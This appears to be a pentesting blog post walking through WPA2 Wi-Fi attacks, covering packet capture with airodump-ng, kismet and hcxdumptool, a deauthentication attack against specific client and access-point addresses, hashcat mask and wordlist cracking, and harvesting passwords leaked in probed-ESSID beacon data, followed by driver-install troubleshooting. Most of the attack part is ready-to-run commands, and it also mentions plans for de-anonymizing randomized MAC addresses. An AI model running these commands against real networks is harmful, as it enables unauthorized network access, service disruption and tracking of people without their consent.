Home

Published

- 7 min read

Bread and Butter Wifi Attacks and Hash Cracking

Offensive Security RedTeam Pentesting Cybersecurity
img of Bread and Butter Wifi Attacks and Hash Cracking

Bread and Butter Wifi Attacks and Hash Cracking

Wi-Fi cracking is a fundamental skill. We’re looking at the Aircrack-ng suite, alongside other tools that developed the state-of-the-art… art of wpa2 hash capturing and cracking.

Aircrack-ng Setup

We’re gonna work with root permissions most of the time.

bash
   $ sudo -i

For those using the RTL8812AU chipset, installing the driver is straightforward.

bash

   $ git clone -b v5.6.4.2 https://github.com/aircrack-ng/rtl8812au.git
$ cd rtl8812au
$ make install

Managing Drivers

Removing and reinstalling network drivers can often resolve issues with device compatibility.

bash
   $ dpkg -r realtek-rtl88xxau-dkms
$ dpkg -r realtek-rtl8814au-dkms

Repo Drivers

Be careful when going with drivers from the repos - most of the time you’ll end up in more trouble.

bash

   $ apt install realtek-rtl88xxau-dkms
$ apt install btscanner aircrack-ng kismet
$ pip3 install kismet_rest deepdiff

Device Configuration

Before launching any attacks, confirm that your network devices are properly recognized and configured:

bash
   $ dmesg | grep 88xx
$ iwconfig

More useful commands

bash
   $ lsmod
$ blkid
$ lsblk
$ lsusb

Process Management

We noticed better success rate when killing the processes like this, instead of the airmon-way… this might be system or adapter specific.

bash
   $ killall wpa-supplicant NetworkManager

Alternatively, you can use airmon-ng to manage interfering processes.

bash

   $ airmon-ng check kill

Initiating Monitor Mode

Monitor mode is essential for capturing packets.

bash
   $ airmon-ng start wlan0 wlan1

Dumping Hashes

Kismet

Kismet allows for detailed network scanning using multiple adapters.

bash
   $ kismet -c wlan0 -c wlan1

airodump-ng

The defacto standard still works great - even though more sophisticated tools are available today.

bash
   $ airodump-ng -o dump01 wlan0,wlan1 --output-format pcap

More useful params

bash
   --essid MyWifiAP 
--bssid ... 
-b abg (bands 2.4/5Ghz) 
-c 1 (channel)
--essid-regex ".*Vag\|VAG\|vag{1}.*" 
-d "CIA Surveillance Van" 
-t OPN

hc-tools

hcxdumptool

For more targeted attacks, tools like hcxdumptool are useful for capturing newer types of hashes. However, pkmid usage is rare, so you might not get what you expect. We found little to no noticeable advantage when dumping directly with hcx tools over using airodump - this may of course be region / target dependent.

We’re still very happy about the development of hcx tools as well as overall progress in Wifi dumping / cracking tools.

bash
   $ hcxdumptool -i wlan0 -o dump02.pcapng

Converting capture files

for processing with hashcat.

bash
   $ apt install hcxtools
$ hcxpcapngtool -o pcapng_hashes *.cap

Deauthentication Attacks

A simple deauthentication attack can disconnect clients from their access points:

bash
   $ aireplay-ng --deauth 200 -a BA:A2:34:22:E7:68 -c 6D:A7:EC:3A:47:58 wlan0

Cracking Hashes

Using Aircrack-ng for local cracking is straightforward but can be slow:

aircrack-ng

bash
   $ aircrack-ng dump.pcap -w wordlist.txt

Hashcat

bash
   $ .\hashcat.exe -m 22000 -d 2 -a 6 -i --increment-min=3 -1 ?l?d -2 ?u?l?d hashes.pcapng rockyou.txt ?2?1?1?1?s?s 
$ .\hashcat.exe -m 22000 -d 2 -a 6 -i -1 "?l?d!_-+*$" hashes.pcapng wpa2_ultimate.txt ?1?1?1?1

Display SSIDs

https://github.com/Network-Sec/bin-tools-pub/blob/main/hashdump_to_ssid.py

We made a little bin tool to display SSIDs from hashdump files.

EAPOL

Capturing the complete 4-way handshake including EAPOL isn’t as important as hcxpcapngtool and some hashcat forum post may make it sound like. airodump-ng in certain scenarios still delievers, in certain scenarios even faster and better than hcxdumptool.

The conversion will work besides the tool complaining and the resulting hashes are the same. Of course, the PKMID attack is a different story, but since it’s finding many modern routers have been patched and are no longer vulnerable to this attack, while we still can capture WPA2 hashes the traditional way.

Tshark and Tcpdump

Don’t skip learning about Tshark and Tcpdump. They will deliver much needed insights, “how this works” and also provide you with easy methods to do manually what hcxcapngtool can do, with custom options to choose.

Wordlists

specific for Wifi. We created couple of Wordlist Generator helper tools, you can find them in our GitHub:
https://github.com/Network-Sec/Wordlists

More Wordlist resources:

Important: We can get a massive speed and success rate gain, if we exclude words shorter than 8 chars, as this is the min length for WPA2.

bash
   $ cat rockyou.txt | grep --binary-files=text -Pe "^[\w\d\s]{8,32}$" | sort -u > wifi_rockyou.txt

Wigle.net

Take wardriving to pro level and find easily, where beacons were collected. Even with a stationary airodump it will give you superpowers. We already developed a JSON similarity clustering algorithm a while ago (on our GitHub), exporting csv, kismet and pcap format at the same time with beacon traffic dumping enabled is very easy. It’s been on our TODO list for a while to build a MAC randomization de-anonymizer via beacon traffic and other device factors, it’s likely the next project we try to finish.

Also wigle.net offers an Android option we haven’t yet tested, as we use our Nethunter phone with airodump and hcxtools as EDC wardriver.

Beacons

can not only used to do some unspecific tracking (you don’t have any time information) but often times people accidently leave entire passwords in their beacon-traffic.

bash
   $ for f in $(grep -Hnai "Probed ESSIDs" *.csv | cut -d ":" -f 1); do awk '/Probed ESSIDs/ {found=1; next} found' $f | cut -d "," -f 7-99 | grep -P "[^\s]" >> beacons.txt; done

You may also want to deal with spaces in the final file, no matter what, you can use the beacons with rules to find more complex keys.

Automation

https://github.com/Network-Sec/bin-tools-pub/blob/main/wifi_dumper.sh

Next Up

We’ll follow up with a dedicated article abouth Hash Cracking Strategies, an applied field manual of modern techniques, that help you to tackle hashes, which are more difficult than top-10000-wordlist passwords or 7 random chars.

In brief though:

  • Adapt wordlist to target, language, etc.
  • Pay attention, hashcat has nice modes, but verify using --stdout that rules or combos are done correctly
  • If you got enough disk space, it’s still the best way to use large lists like former crackstation or prepare your own lists
  • Put a rule over everything. We rarely run out of time, we mostly run out of words

Bonus: Then it stopped working

All our adapters, including Laptop internal adapters of various brands, worked fine and without issue, usually one or the other driver, from the Kali apt archives, from aircrack-ng’s GitHub or at least an older 3rd party branch, made it work in minutes and without hassle. That was until we upgraded or newly installed Kali Kernel > 6.4.x - suddenly it stopped working.

It took us days of trial and error, finally making a forensic investigation of the working driver on an older Kali VM we still had around, to get back to a running state.

So, TL;DR

bash

   # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
# How to Use Alfa AWUS036ACH in Monitor Mode with Kali Kernel > 6.4.1 #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

# We did it all as root
$ sudo -i

# Keeping a second window open on the side
$ dmesg -w

# 1. Clone the Repository and Checkout the Correct Commit
$ git clone https://github.com/aircrack-ng/rtl8812au.git
$ cd rtl8812au

# This is the last known-good branch for this model in 2025-01-01
$ git checkout 63cf0b4

# 2. Fully Automatic Build and Install Using dkms.conf
# 2.1 Prepare the Source Directory
$ mkdir -p /usr/src/rtl8812au-5.6.4.2
$ cp -r . /usr/src/rtl8812au-5.6.4.2

# 2.2 Register the Module with DKMS
$ dkms add -m rtl8812au -v 5.6.4.2

# 2.3 Build and Install the Module
$ dkms autoinstall

# 3. Verify the Module Installation
$ dkms status

# Maybe more importantly, this line should look again like in Kali < 6.5.0
$ airmon-ng                         

PHY     Interface       Driver          Chipset
phy0    wlan0           88XXau          Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac 2T2R DB WLAN Adapter

# 4. Optional: try using it first (5.) before attempting the following steps
# Load and Test the Driver
$ modprobe 88XXau
$ iwconfig  

# 5. Enable Monitor Mode and Test Packet Capture - may work even without kill
$ airmon-ng start wlan0 
$ airodump-ng wlan0

Conclusion

“Welcome to the 21st Century. Where sex is free, but love is expensive. Where Pizza arrives faster than an Ambulance and a Smartphone is more important than dignity.”

“Welcome to the darkness, where lying is modern, treason is smart and poverty a flaw.”